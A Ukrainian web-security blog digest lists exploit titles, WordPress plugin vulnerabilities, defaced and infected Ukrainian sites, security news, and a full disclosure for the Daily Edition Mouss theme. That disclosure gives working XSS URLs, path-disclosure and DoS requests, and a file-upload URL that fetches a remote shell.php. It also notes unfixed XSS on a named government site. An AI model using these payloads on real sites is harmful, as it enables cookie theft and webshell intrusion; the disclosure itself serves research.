Websecurity - Веб безпека

В даній добірці експлоіти в веб додатках:

• SurgeFTP Remote Command Execution Vulnerability (деталі)
• Foswiki MAKETEXT Remote Command Execution Vulnerability (деталі)
• TWiki MAKETEXT Remote Command Execution Vulnerability (деталі)
• TVMOBiLi Media Server 2.1.0.3557 Denial Of Service (деталі)
• Opera Web Browser 12.11 Crash PoC (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Myflash, Clockstone та WP Property. Для котрих з’явилися експлоіти. Myflash - це плагін для створення слайдшоу з флешек, Clockstone - це тема движка, WP Property - це плагін для управління списками майна та нерухомості.

• WordPress Myflash Local File Inclusion (деталі)
• WordPress Clockstone Theme File Upload (деталі)
• WordPress WP-Property PHP File Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи розпочату традицію, після попереднього відео про нові шляхи взлому веб додатків, пропоную нове відео на веб секюріті тематику. Цього разу відео про те, як хакнути мільйони роутерів. Рекомендую подивитися всім хто цікавиться цією темою.

Defcon 18 - How to hack millions of routers

Два з половиною роки тому на конференції DEFCON 18 відбувся виступ Craig Heffner. В своєму виступі він розповів про уразливості в роутерах та їх експлуатацію. Зокрема він розповім про атаки на роутери з використанням Cross-Site Request Forgery та DNS Rebinding. З використанням даних методів атак, можна захопити контроль над різними мережевими пристроями (з функцією роутера), яких сотні мільйонів по всьому світу.

Про ці методи, як про CSRF атаки, так і про про DNS Rebinding я вже писав. Про CSRF атаки на модеми і точки доступу я написав власну статтю CSRF Attacks on Network Devices та наводив чимало таких уразливостей в різних пристроях, а про DNS Rebinding я наводив різноманітні статті й відео від RSnake. Рекомендую подивитися дане відео для розуміння векторів атак на мережеві пристрої.

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://sumy-g.upszn-sumy.gov.ua (хакером hatrk) - 11.09.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://bogodukhivrda.gov.ua (хакером DR-MTMRD) - 18.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://vinjust.gov.ua (хакером Nob0dy) - 22.10.2012 - похаканий державний сайт, зараз сайт вже виправлений адмінами
• http://www.formulove.com.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами
• http://ufb.org.ua (хакером Badi) - 12.01.2013, зараз сайт вже виправлений адмінами

21.07.2012

Сьогодні я знайшов Cross-Site Scripting уразливості на http://zpd.gov.ua - сайті Державної служби України з питань захисту персональних даних. Про що найближчим часом сповіщу адміністрацію сайта.

Сайт використовує Megapolis.Portal Manager, в якому я виявив багато уразливостей (з 2006 по 2012 рік я знайшов чимало дірок в цьому движку). Тому й на ньому також є дірки подібно до сайтів Кабміну, Парламенту та іншим державним сайтам.

І це сайт тієї служби, що захищає персональні дані українців. Риторичне запитання: раз ця служба штрафує за недотримання закону про захист персональних даних, то чи оштрафує вона сама себе, якщо через дірки на їхньому сайті станеться витік персональних даних.

Детальна інформація про уразливості з’явиться пізніше.

23.01.2013

XSS:

• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• alert(document.cookie)
• цікавий
• html включення

Дані уразливості досі не виправлені. Якщо ця служба не може убезпечити власний сайт, то навряд чи вона зможе убезпечити персональні дані громадян України.

За повідомленням www.xakep.ru, прогноз Symantec по кіберзагрозам на 2013 рік.

Експерти Symantec опублікували прогноз основних тенденцій у світі інформаційної безпеки, що можуть виявити себе в 2013 році. Прогноз складений за результатами обговорення із сотнями штатних і незалежних експертів, так що це не суб’єктивна думка однієї людини, а результат колективного “мозкового штурму”, з урахуванням розвитку ринку в останні роки.

П’ятірка прогнозів від Symantec:

1. Кіберконфлікти стануть звичайною справою.
2. Шкідливі програми з вимогою оплати.
3. Мобільні рекламні віруси стануть набагато популярніше.
4. Монетизація соціальних мереж обіцяє нові небезпеки.
5. Користувачі переходять на мобільні пристрої та в хмару, за ними йдуть і кіберзлочинці.

За повідомленням ain.ua, у Києві затримали хакера, що займався DDoS-атаками на замовлення.

Київська міліція затримала підозрюваного, що проводив DDoS-атаки на українські й закордонні сайти комерційних організацій за замовленням конкурентів - в основному, російські ресурси. Усього йому вдалося провести близько 50 атак.

За заявою головного інспектора відділу по виявленню злочинів у сфері платіжних систем і інформаційної безпеки МВС Богдана Тищенко, це перший випадок затримки хакера, що працював за замовленням. Міліції також удалося встановити, що киянин підтримував зв’язки з міжнародним хакерським рухом.

Це МВС вперше спіймала такого діяча. В 2009 році СБУ вже спіймала DDoS-ера у Дніпропетровську.

За повідомленням www.xakep.ru, аналіз граматичних залежностей у парольній фразі.

Учені з Карнегі-Меллона опублікували цікаве дослідження, у якому оприлюднили результати аналізу алгоритму для взлому довгих парольних фраз, складених з декількох слів, таких як thispasswordrules чи abiggerbetterpassword. Учені склали граф сполучуваності різних слів один з одним. Виявилося, що в мові не так вже багато комбінацій слів: за одним конкретним словом майже завжди випливає обмежена кількість інших, цілком визначених, слів. Існує тверда граматична залежність частин парольної фрази.

Довгі паролі з 20-25 символів звичайно вважаються стійкими до брутфорсу, але при використанні алгоритмів з аналізом граматичних зв’язків вони підбираються набагато швидше. Учені розробили Proof-of-concept алгоритм для “взлому” граматичних конструкцій і збільшення ефективності атаки по словнику.

Виявленні численні уразливості в Google Chrome для Android.

Уразливі версії: Google Chrome 18.0.

Численні способи обходу захисту і підвищення привілеїв.

• Chrome for Android - Cookie theft from Chrome by malicious Android app (деталі)
• Chrome for Android - Bypassing SOP for Local Files By Symlinks (деталі)
• Chrome for Android - Android APIs exposed to JavaScript (деталі)
• Chrome for Android - Download Function Information Disclosure (деталі)
• Chrome for Android - UXSS via com.android.browser.application_id Intent extra (деталі)

В даній добірці експлоіти в веб додатках:

• Novell File Reporter Agent XML Parsing Remote Code Execution (деталі)
• PostgreSQL for Linux Payload Execution Vulnerability (деталі)
• Uploadify jQuery Generic File Upload (Metasploit) (деталі)
• Serva v2.0.0 HTTP Server GET Remote Denial of Service Vulnerability (деталі)
• Serva v2.0.0 DNS Server QueryName Remote Denial of Service Vulnerability (деталі)

У січні, 13.01.2013, я знайшов Information Leakage, Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Daily Edition Mouss для WordPress.

Раніше була оприлюднена SQL Injection уразливість в Daily Edition Mouss. В якій я знайшов багато нових дірок. Схоже, що це тема Daily Edition від WooThemes, про дірки в якій я писав в 2011 році. Тому окрім SQL injection, в цій темі багато інших уразливостей.

Information Leakage (SQL DB Structure Extraction) (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/fiche-disque.php?id=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

XSS (WASC-08):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://site.flickr.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dailyedition-mouss/thumb.php?src=http://flickr.com.site.com/shell.php

AoF, DoS, AFU уразливості не працюють в останній версії теми (в якій я тестував їх). Це може бути в зв’язку з захистом від AFU дірки в TimThumb. Але вони повинні працювати в ранніх версіях цієї теми.

Уразливі всі версії теми Daily Edition Mouss для WordPress.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://vvadm.gov.ua - інфікований державний сайт - інфекція була виявлена 16.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://statuspress.com.ua - інфекція була виявлена 27.10.2012. Зараз сайт не входить до переліку підозрілих.
• http://vsveta.com.ua - інфекція була виявлена 21.01.2013. Зараз сайт входить до переліку підозрілих.
• http://troeschina.com - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.
• http://b-52.kiev.ua - інфекція була виявлена 23.11.2012. Зараз сайт не входить до переліку підозрілих.